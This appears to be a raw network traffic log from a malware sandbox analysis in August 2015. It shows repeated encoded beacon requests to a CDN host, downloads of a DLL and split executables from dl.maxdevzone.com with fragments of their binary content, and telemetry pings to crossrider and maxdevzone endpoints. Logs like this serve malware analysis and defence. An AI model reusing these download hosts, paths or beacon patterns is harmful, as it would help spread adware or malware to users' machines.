X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePFASu7RG65lJccV0JiYKAXBPEhRyyBD7BWRKLvFc2rIXiEA2WeFUVr213KsnHgPGCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YBQj9NsOhLpx HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePPceMBfl/cy7pBWSGYE25tjgb6v7cXpPvkBonvh1TCK4JQffTeIm3ijZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBVBPfpXcC0NNCUHeR8YCF35glrEy57w/m07ReD/zc3 EeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNniPNzdiMCZhKHLVCAz6ZQsefjE2MjqpXZgKAqHEqChQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMDqVqSY7buIRtCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/  a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0JzvOmbeJDXy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOWnHKXQ4ByT9CUHeR8YCF3cICI7/tQlejZeojEglKF4ySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjGxrTqW15vZAooxpS5ufgquJVjHmrT0TCdGBVM3gUbVwDpXxHWgmjuq9qGTCPFxGMacNTVL60tsKrgHWJBZg2eTkxN6pxw89Ap19bfV/XketHQPSr00xn/pt5BjWOuab4BLZMo3KhL4A7oa41N9YhxikzL8hyzXRMc0g1gcxjite /Y3KN3CLINidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHidfzjtSC7/eFaNh3QJEALW3T8P/xsh451fiSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YMtu6Il6K42s07l01ouN0CW2hnxCMb9MQTrbPokHTCrpfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV2YCgKhxKgoU= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1moiejxERrnrFXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuYvKyHshi0NtNKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YPRE4iM0F3Z8SSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv  oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3Au2 WNxArStCUlpNEzah78fl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=obiBp3WOda9tb/LgACKPGkQ1GWwIMthw2qShU7Jjo1uAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRAKcFpVLy3NZgKkdlz1lRofr/zw3mMKgg0JQd5HxgIXcyW34jq/xhC69GO739HYqB8SJA d bWCFeYyujkXy401 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:31 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=c2mW1WEUbCET/daslwwbUogIgfgifRkfaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFclHT2qvGHts3SQCeXx1TCLUISLCJlFqul4CnWC C4vHu2csK9H8/A3AVeGnpHjBs0JQd5HxgIXcvF5YR0KhEBdvPLr6VHnfYX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=QHucCbLl /YLjT49fHfOTKA34GYfZJUsjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2XwF8xC533FcDPI5dGTWg7/iOZEO6FSB/sV8mKKVLIm1QG1CxyaZxv/Uh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLk5dEnxxU7GnDLXqPK521tdAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:35 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /bxsdk32.dll HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dyd9qf154h76q.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 942080
Connection: keep-alive
Date: Wed, 05 Aug 2015 01:43:20 GMT
Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT
ETag: "05c47da12b0009bd98653f51287f7768"
Accept-Ranges: bytes
Server: AmazonS3
Age: 34381
X-Cache: Hit from cloudfront
Via: 1.1 285c2c55f99cbebf129726ce90679db6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ttW5rJ_Hd-gTatxPJ7sNHzyPNwuiJe2pZt_ziMFfqyY7OcHZEUbKQw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...
#.......!...........#...........I......."......."......."...Rich#.....
......................PE..L...9.dT...........!................P.......
.................................`....................................
..............................................tn..@...................
................................8............................text...O.
.......................... ..`.rdata...t..........................@..@
.data...x.... ....... [email protected].........................
......@[email protected][email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=25324 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /web/gf/all/setup.exe_c HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433375"
Last-Modified: Thu, 13 Aug 2015 02:36:15 GMT
Cache-Control: max-age=1268
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop002.am4.t,1439464765.cds058.am4.c
..Z..r..o=..`.S...O..*%..H6kZuR........m...'......?.....o..p.lm....r..
.e.P..e.`n.|......$$l3....V5.,imnB......~.J...6!_kg...n....fF6.e)...8=
<..K....G/.Q.......SP...........zS...f_k.......<.:T10._...?...4.
.<..diZ..r.........?./.6..2.........!.>...R._$...=.|.RG...d.#...
b......T~.......o*..MX.<..`...W.h.1".....W....N....=...wb..l....z..
>...ps. ...3...&h.8<....^w...Qjy5?.)...B..D.3.x*[email protected]
..g.....8q..FU.....`..N...H...w.k.......:...p...<...S.~.p.Y........
..i.6........._....*rf>.2j.x.\*6F..l.....M.A..I>.......a...._...
[email protected]......$.C.*J_....&...P.U./.H.....;..J.x...[k....N=....M6..I.M..
...s$oWY...\mbf.4..zh.Y;.5.(.k....y.....w...dt........M..R..>.....b
 .%-kBd)...$..8...f.8...Q,...;.q.Z........4.'k.,[email protected].!.
m.9..V.#m...{ ......g..!..o..r..4F .I.Cwi.bf..L.*N... ...\..R.6N.K.l..
.............].^4...^...N...5[......10~...3.`.q-.*..C....OP9wJR..[v...
'q.?"B.._hT'....*..X..UO.....a.`......<.?..]..../0L.8...=..Z%O.....
7*.n2..#s......p|!.S..N...3..".P...m...]....yp.A=o)...D}hzo%.N..M..E..
....8...j.x}9.hB...V..j.t...QZ.......K.[D....'..~..._.8.7...jPTW..p<
;)..`..@..'....5n` ..Gl...?pF.^.....M.I.E.6:I...#..H..~B.{..N...I.....
..!...Z:....KY...|..|.yZ.p.D.(. ......N!^..!.."6.....?.<k....o9'..a
._J....DF.0.c=.C..g.8.Qu.......I....6..).QQ...C...F...j.(>.`...O...
.Z.]...$.g.n.0..MQ..".>b.=...\......[.....YY....y............-.....
.U0..HvZ...[.Qv...B.O4..v..)..\m.......l..l..[.\..........r.,.........
.6..&'..z...>..?\..t<..5.V;;.F.$..$.,`......L..TY...d...) ..
<<< skipped >>>


GET /web/gf/all/setup.exe_a HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433370"
Last-Modified: Thu, 13 Aug 2015 02:36:10 GMT
Cache-Control: max-age=1267
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop019.am4.t,1439464765.cds054.am4.c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
......./........ ..............................p.......p..`L..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected]...`L.
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


GET /spdbt/shoppy/snsch7.exe_e HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:26 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439448690"
Last-Modified: Thu, 13 Aug 2015 06:51:30 GMT
Cache-Control: max-age=3207
Content-Length: 2026234
Content-Type: text/plain
X-HW: 1439464766.dop019.am4.t,1439464766.cds038.am4.sr,1439464765.dop007.dc1.r,1439464766.cds023.dc1.c,1439464766.cds038.am4.pr
.O...{.........,..ly.y=nQ.....W.Z.)...} U.1$..`kC..d.;..<X..0...cg.
...]....D....B..%.;x.sZ.E......v..2.=...}..y.<..t..\.:...%..L..V..5
...a.hyM.\%[email protected]<.&.-'.F........1..)...G.....w..hQ.
..............c.v..B...V<......o......CM0...#"@f$.M. &.t.s.....#n..
>ol...B........2&..>.........R.......i..-.v.>%.r... O....!.&g
t;.JV..3...........9C-...u".........?.E./...G.S.J.%[email protected].).
z..3...A..Z_n{.....Z........p....j.pI.......L*..b..^r.....P.>...^k.
.....'.......v.r.V............_.1hrgMQ...R....hW\eO`,........9z..}....
..P...n.P..u......*[email protected]..]..g .;SQ.%...<.........b#x..
..s=.s....#.x# .d..%i.q.. ....J.........:.L...?...S(...|.fI.......f..$
f......G.}...:/.....#.J.......}vk......u.....;T....R.6.6....(.H.x.....
nr...y..z#......x..F..H..K.^O8.....QY...jDDt...>K............/R...H
...HV..q.....Q..-Z.9p...M....R.q....v..4T.h2..[.v~.l.......kk.g:..T.Q[
....?Z-......../t..v..b.....M.#....4."...uSP.u...j.......~ &...x&g~...
.f7..I.7..Xl....{........./c.................6........2/t.....QK.T|.#q
[..f....PRs.E.?.t.&..rNR3..x..b.([email protected]...`....j[h.S:. ......^
I..9Wk..%P..W.?...|.t...<..E8....{....d..d.@. .3..W7.....9...s.Q...
M.T.:..T_m`DK.(&......[.....u..v38..7.iW$< .U[_O.........1.S5.&r.Hs
.(......../..l..D..f...N../.....p...t.q..`5!..E.W..W..U.....E1....v...
....Q.RP.z..Mq.z...o.&......n>...s...bA...p.....J?.b....F>.T^...
[email protected]......,...y.R..o.
.$.#.J.[....g....*.t..k.8...DRex...J*.>M......g...`....tG..tY..
<<< skipped >>>


GET /spdbt/shoppy/snsch7.exe_b HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache



..~).f@......".....vWtE......p....a....OVP......6......[Rk...b....K1h.
..U......A.4g.........{...o.1..\$.%...k.)I...?jn.%S.5lc)\.k.4..B.`....
u.4}.........P.$....3T .... .0.ru6?hF.a...V..RX.a.F........<...f. J
....mM.&.'$.M..j...}.._..k6.P..H6.)H.1....?.;%?.H.7.....pL...._..[....
$M...N ........~7..7.....D.j.-........|TVj......?.2......"b..XlL.]...*
......FF.......g{..k*`.....h...K...!.....yIA^><.Qj..6]..;HUi...~
.3...C..h..Yhzw.Zx.60...${[email protected].}.pV..^..M<.5..o.2s71:.~....
..>`. ..!.z....p..4.0...)....(.".7.^...h.i...6..*L..Q.......|...z.g
.....S.%....j......Z..%...?2L......J....d....a. .).V...O.P.9.......w\.
.Gt..Mm..nA..2...L7.~(7>/v..e8.`....H.5.......~.....[.`...:k.....3.
..A...9U.=..e^j...~...v........6..;..5.H{.a...c..e.eA....9........'...
G7...'...*.=........U'[email protected]....
[email protected]......:.j............X..Jw.5...r.FT.uDs..........Ku...n....C.D....
-.([email protected]....".....W{.iT08"r5.!..*....V*..f...:.j..u(....XI...*..\.c
Sl|....P%.%...>1...gK.6..j.!B.M...:x........s. |...r.w[....DA{gv...
.$l.!.(....l....j.pN..k...D....d9|...FO......N..B9.O.$)\...D..H../5D..
.....ZH.][email protected]!...[....."...A.%L..w.8J.|^..h...SoK.{.
.......9....~8..j&;....z...6H...=.....'..D....x.@"RIPHidLP.>}.T...R
j.c.....Me..'....,....j..g....mE....g.>&..n...c0.....R..g..0......q
W...T.S.....I.....H.........$E.ha...........M...&.r.]2.....Vs.}../....
.....Us.3I..\[email protected].%..\../.._%z.y0y..G$....rJ.wsU..-
...._8_X..&...6..|R...J..)...Q( MN.....p.l..L.I...H3wP.%.t]<F..
<<< skipped >>>


GET /utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1439464836 HTTP/1.1
Host: errors.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: loISk0rVVmvriLdWMzgdp2e TXvYBEFyiFds68dtB30HMCw9wppZxWfXtQ82LvJo
x-amz-request-id: 039A4FA8D7DF6531
Date: Thu, 13 Aug 2015 11:19:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Sun, 02 Aug 2015 12:57:10 GMT
